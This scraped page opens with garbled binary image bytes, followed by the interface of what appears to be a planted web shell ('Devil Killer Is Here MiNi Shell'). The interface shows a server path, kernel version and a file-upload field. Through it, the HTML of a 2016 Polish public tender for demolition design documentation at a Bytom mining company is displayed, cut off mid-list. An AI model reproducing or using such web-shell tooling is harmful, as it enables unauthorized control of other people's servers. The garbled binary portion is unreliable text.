JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160624/103007-N-2016.html

<p class="kh_header"><b>Bytom: Wykonanie dokumentacji-projektów budowlano-wykonawczych likwidacji 32 obiektów budowalnych wraz z kosztorysami inwestorskimi dla SRK S.A. Oddział KWK Brzeszcze Wschód</b><br>
<b>Numer ogłoszenia: 103007 - 2016; data zamieszczenia: 24.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji-projektów budowlano-wykonawczych likwidacji 32 obiektów budowalnych wraz z kosztorysami inwestorskimi dla SRK S.A. Oddział KWK Brzeszcze Wschód.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji-projektów budowlano-wykonawczych likwidacji 32 obiektów budowalnych wraz z kosztorysami inwestorskimi dla SRK S.A. Oddział KWK Brzeszcze Wschód.
Część I:	Aktualizacja dokumentacji technicznej: Projekt budowlano-wykonawczy likwidacji wieży szybowej szybu Andrzej VI, kanału wentylacyjnego                            z wyposażeniem oraz likwidacji przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami wraz z kosztorysami inwestorskimi                               (na podstawie istniejącego Projektu technicznego likwidacji szybu Andrzej VI w aspekcie likwidacji partii wschodniej złoża Brzeszcze)
Część II:	Projekt budowlano-wykonawczy likwidacji dwóch budynków wentylatorów wraz z wentylatorami i dyfuzorami przy szybie Andrzej VI, budynku zakładowej stacji transformatorowej i zbiornika wody chłodzącej                               z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami wraz z kosztorysami inwestorskimi
Część III:	Aktualizacja dokumentacji technicznej: Projekt budowlano-wykonawczy likwidacji Zakładu Przeróbki Mechanicznej i dobudówki warsztatu                               z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami, opracowanie projektu budowlano-wykonawczego likwidacji budynku warsztatowo-magazynowego wraz z kosztorysami inwestorskimi.
Część IV:	Projekt budowlano-wykonawczy likwidacji 24 obiektów budowlanych                            z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami wraz z kosztorysami inwestorskimi
3.	Szczegółowy opis przedmiotu zamówienia oraz jego zakres wraz z uwarunkowaniami techniczno-organizacyjnymi zawiera załącznik nr 2 do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.14.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta powinna być zabezpieczona wadium w wysokości: 
Część I: 600,00 zł (słownie: sześćset złotych 00/100)
Część II: 800,00 zł (słownie: osiemset złotych 00/100)
Część III: 600,00 zł (słownie: sześćset złotych 00/100)
Część IV: 3 600,00 zł (słownie: trzy tysiące sześćset złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Zamawiający uzna warunek w zakresie wiedzy i doświadczenia za spełniony, jeżeli  Wykonawca wykaże się należytym wykonaniem głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w tym co najmniej jedną usługą w ramach jednej umowy polegającą na wykonaniu dokumentacji projektowej o wartości minimum                        Część I: 10 000,00zł brutto, Część II: 15 000,00 zł brutto, Część III: 10 000,00 zł brutto, Część IV: 70 000,00 zł brutto, wraz z dowodami realizacji wszystkich usług ujętych w wykazie.
3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomucznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia
4.	Jeżeli Wykonawca, wykazując spełnianie warunku, o którym mowa w pkt. 5.2 SIWZ polega na zasobach innych podmiotów, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w trakcie realizacji zamówienia oraz oceny, czy stosunek łączący go z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, obowiązany jest przedłożyć dokumenty dotyczące:
1)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
2)	sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonaniu zamówienia,
3)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
4)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Zamawiający uzna warunek w zakresie dysponowania osobami za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami zdolnymi do realizacji zadania objętego zamówieniem, posiadającymi uprawnienia:
do samodzielnego projektowania w specjalności konstrukcyjno - budowlanej bez ograniczeń - minimum 1 osoba 
do samodzielnego projektowania w specjalności konstrukcyjno - budowlanej                     bez ograniczeń - min. 1 osoba do weryfikacji opracowanego projektu
wraz z zaświadczeniami o przynależności do właściwej Izby Inżynierów Budownictwa</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oświadczenia Wykonawcy w trybie art. 44 ustawy Pzp w związku z art. 22 ust.1
ustawy Pzp zgodnie z pkt. 5.1. SIWZ - załączniki nr 2, 2a, 2b, 2c, 2d do druku OFERTA.   
Wykonawca powołujący się przy wykazaniu spełniania warunków udziału                            w postępowaniu w zakresie wiedzy i doświadczenia, potencjału technicznego, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów (załączniki nr 2a, 2b, 2c, 2d), zobowiązany jest uzyskać pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, które należy dołączyć do załączników nr 2a, 2b, 2c, 2d do druku OFERTA. 
Wzór zobowiązania podmiotu trzeciego stanowi załącznik nr 2e do druku OFERTA.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Zatrudnienie na podstawie umowy o pracę osób wykonujących czynności w trakcie realizacji zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty,                   na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem ustawowej zmiany obowiązującej stawki podatku od towarów i usług,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SRK S.A. ul. Strzelców Bytomskich 207, 41-914 Bytom-30,00+VAT w przypadku odbioru osobistego (gotówka) lub pocztą (za zaliczeniem)- w przypadku pobrania SIWZ ze strony internetowej-bezpłatnie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.07.2016 godzina 11:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 - sekretariat Spółki (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> .PODWYKONAWSTWO

1.	Informacja o obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia: 
1.	Zamawiający nie wprowadza żadnych ograniczeń odnośnie zakresu prac, których wykonanie Wykonawca zamierza powierzyć podwykonawcy
2.	Powierzenie części zamówienia podwykonawcy:
1.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
2.	Zamawiający żąda wskazania przez Wykonawcę w ofercie - Załącznik nr 5 - części zamówienia, której wykonanie zamierza powierzyć podwykonawcy lub podania przez Wykonawcę nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1.
3.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie, na dzień zgłoszenia zmiany, spełnia je                  w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I:	Aktualizacja dokumentacji technicznej: Projekt budowlano-wykonawczy likwidacji wieży szybowej szybu Andrzej VI, kanału wentylacyjnego                            z wyposażeniem oraz likwidacji przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami wraz z kosztorysami inwestorskimi                               (na podstawie istniejącego Projektu technicznego likwidacji szybu Andrzej VI w aspekcie likwidacji partii wschodniej złoża Brzeszcze).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wieża szybowa szybu Andrzej VI - konstrukcja: mur z cegły pełnej gr. 0,38 m, kubatura 750 m3, wys. 15,95 m, średnica zewnętrzna 7,52 m;
Kanał wentylacyjny - dł. 60 m, przekrój 4,2 x 4,2 m, pow. zabudowy 270 m2;
Przyłącza i urządzenia przesyłowe integralnie związane z tymi obiektami -                          wg przeprowadzonej inwentaryzacji.

Zakres rzeczowy dokumentacji - projektu powinien obejmować aktualizację istniejącego projektu rozbiórki w zakresie:
inwentaryzacji  przeznaczonych do rozbiórki obiektów,
inwentaryzacji przewidzianego do odzysku złomu z likwidacji obiektów,
rozbiórki obiektów budowlanych wraz z fundamentami,
demontażu i rozbiórki wyposażenia obiektów budowlanych,
likwidacji przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami,
inwentaryzacji odpadów pochodzących z rozbiórki,
inwentaryzacji materiałów z rozbiórki nadających się do zasypania szybu oraz nakłady na ich pozyskanie,
likwidacji kanałów (np. kablowych, itp.) wokół rozbieranych obiektów,
zasypania pustek po rozbiórce fundamentów materiałami,
uzyskania pozwolenia na rozbiórkę w/w obiektów,
robót porządkowych.

Dokumentacja techniczna powinna zawierać:
niezbędne obliczenia,
inwentaryzację obiektów przeznaczonych do rozbiórki (dla każdego obiektu osobno)                      - 2 egzemplarze w wersji papierowej, 2 egzemplarze w wersji elektronicznej,
część opisową (sposób wykonania rozbiórki) i rysunkową (dla każdego obiektu osobno)                - 4 egzemplarze w wersji papierowej, 2 egzemplarze. w wersji elektronicznej,
przedmiary robót (dla każdego obiektu osobno) - 4 egzemplarze w wersji papierowej                       i 2 egzemplarze w wersji elektronicznej,
kosztorysy inwestorskie (dla każdego obiektu osobno) - 4 egzemplarze w wersji papierowej, 2 egzemplarze w wersji elektronicznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.32.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Zatrudnienie na podstawie umowy o pracę osób wykonujących czynności w trakcie realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II
Projekt budowlano - wykonawczy likwidacji dwóch budynków wentylatorów wraz 
z wentylatorami i dyfuzorami przy szybie Andrzej VI, budynku zakładowej stacji transformatorowej i zbiornika wody chłodzącej z wyposażeniem oraz likwidacją przyłączy 
i urządzeń przesyłowych integralnie związanych z tymi obiektami wraz z kosztorysami inwestorskimi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dwa budynki wentylatorów wraz z wentylatorami i dyfuzorami przy szybie Andrzej VI                  z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tymi  obiektami, pow. zabudowy 300,0 m2, kubatura 1250,0 m3, 
Budynek zakładowej stacji transformatorowej A VI wraz z wyposażeniem oraz likwidacją przyłączy 
i urządzeń przesyłowych integralnie związanych z tymi obiektami, pow. zabudowy                    200,0 m2, kubatura 1200,0 m3,
Zbiornik wody chłodzącej wraz z wyposażeniem oraz likwidacją przyłączy i urządzeń  przesyłowych integralnie związanych z tymi obiektami, pow. zabudowy 70 m2, kubatura 150,0 m3, gł. 2,43 m.

Zakres rzeczowy dokumentacji - projektu powinien obejmować:
inwentaryzację  przeznaczonych do rozbiórki obiektów,
inwentaryzację przewidzianego do odzysku złomu z likwidacji obiektów,
rozbiórkę obiektów budowlanych wraz z fundamentami,
demontaż i rozbiórkę wyposażenia obiektów budowlanych,
likwidację przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami,
inwentaryzację odpadów pochodzących z rozbiórki,
inwentaryzację materiałów z rozbiórki nadających się do zasypania szybu oraz wyliczenie nakładów na ich pozyskanie,
likwidację kanałów (np. kablowych, itp.) wokół rozbieranych obiektów,
zasypanie pustek po rozbiórce fundamentów materiałami,
uzyskanie pozwolenia na rozbiórkę w/w obiektów,
roboty porządkowe.

Dokumentacja techniczna powinna zawierać:
niezbędne obliczenia,
inwentaryzację obiektów przeznaczonych do rozbiórki (dla każdego obiektu osobno)                       - 2 egzemplarze w wersji papierowej, 2 egzemplarze w wersji elektronicznej,
część opisową (sposób wykonania rozbiórki) i rysunkową (dla każdego obiektu osobno)                   - 4 egzemplarze w wersji papierowej, 2 egzemplarze w wersji elektronicznej,
przedmiary robót (dla każdego obiektu osobno) - 4 egzemplarze w wersji papierowej                       i 2 egzemplarze w wersji elektronicznej,
kosztorysy inwestorskie (dla każdego obiektu osobno) - 4 egzemplarze w wersji papierowej, 2 egzemplarze w wersji elektronicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Zatrudnienie na podstawie umowy o pracę osób wykonujących czynności w trakcie realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III:	Aktualizacja dokumentacji technicznej: Projekt budowlano-wykonawczy likwidacji Zakładu Przeróbki Mechanicznej i dobudówki warsztatu                               z wyposażeniem oraz likwidacją przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami, opracowanie projektu budowlano-wykonawczego likwidacji budynku warsztatowo-magazynowego wraz                         z kosztorysami inwestorskimi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakład Przeróbki Mechanicznej i dobudówka warsztatu, pow. zabudowy 961,0 m2, kubatura 12 500,0 m3 aktualizacja istniejącego projektu,  
Budynek warsztatowo-magazynowy AIII/IV przy byłym magazynie, projekt budowlano-wykonawczy likwidacji,
Przyłącza i urządzenia przesyłowe integralnie związane z tymi obiektami wg przeprowadzonej inwentaryzacji.

Zakres rzeczowy dokumentacji - projektu powinien obejmować:
inwentaryzację  przeznaczonych do rozbiórki obiektów,
inwentaryzację przewidzianego do odzysku złomu z likwidacji obiektów,
rozbiórkę obiektów budowlanych wraz z fundamentami,
demontaż i rozbiórkę wyposażenia obiektów budowlanych,
likwidację przyłączy i urządzeń przesyłowych integralnie związanych z tymi obiektami,
inwentaryzację odpadów pochodzących z rozbiórki,
inwentaryzację materiałów z rozbiórki nadających się do zasypania szybu oraz wyliczenie nakładów na ich pozyskanie,
likwidację kanałów (np. kablowych, itp.) wokół rozbieranych obiektów,
zasypanie pustek po rozbiórce fundamentów materiałami,
uzyskanie pozwolenia na rozbiórkę w/w obiektów wraz z uzgodnieniami w tym                               z konserwatorem zabytków,
roboty porządkowe.

Dokumentacja techniczna powinna zawierać:
niezbędne obliczenia,
inwentaryzację obiektów przeznaczonych do rozbiórki (dla każdego obiektu osobno)                        - 2 egzemplarze w wersji papierowej, 2 egzemplarze w wersji elektronicznej,
część opisową (sposób wykonania rozbiórki) i rysunkową (dla każdego obiektu osobno)                  - 4 egzemplarze w wersji papierowej, 2 egzemplarze w wersji elektronicznej,
przedmiary robót (dla każdego obiektu osobno) - 4 egzemplarze w wersji papierowej                              i 2 egzemplarze w wersji elektronicznej,
